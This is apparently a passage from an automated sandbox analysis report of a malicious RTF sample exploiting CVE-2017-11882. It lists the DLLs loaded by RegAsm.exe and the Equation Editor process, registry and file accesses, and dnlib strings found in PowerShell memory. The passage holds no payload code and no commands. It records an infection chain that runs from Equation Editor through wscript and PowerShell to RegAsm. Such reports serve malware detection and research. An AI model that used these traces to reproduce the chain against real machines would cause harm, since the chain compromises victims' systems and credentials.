                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: shcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pstorec.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.LNK.0.drLNK file: ..\..\..\..\..\Desktop\SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtf
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000007.00000002.367149244.0000000006200000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000007.00000002.365223710.00000000035C9000.00000004.00000800.00020000.00000000.sdmp
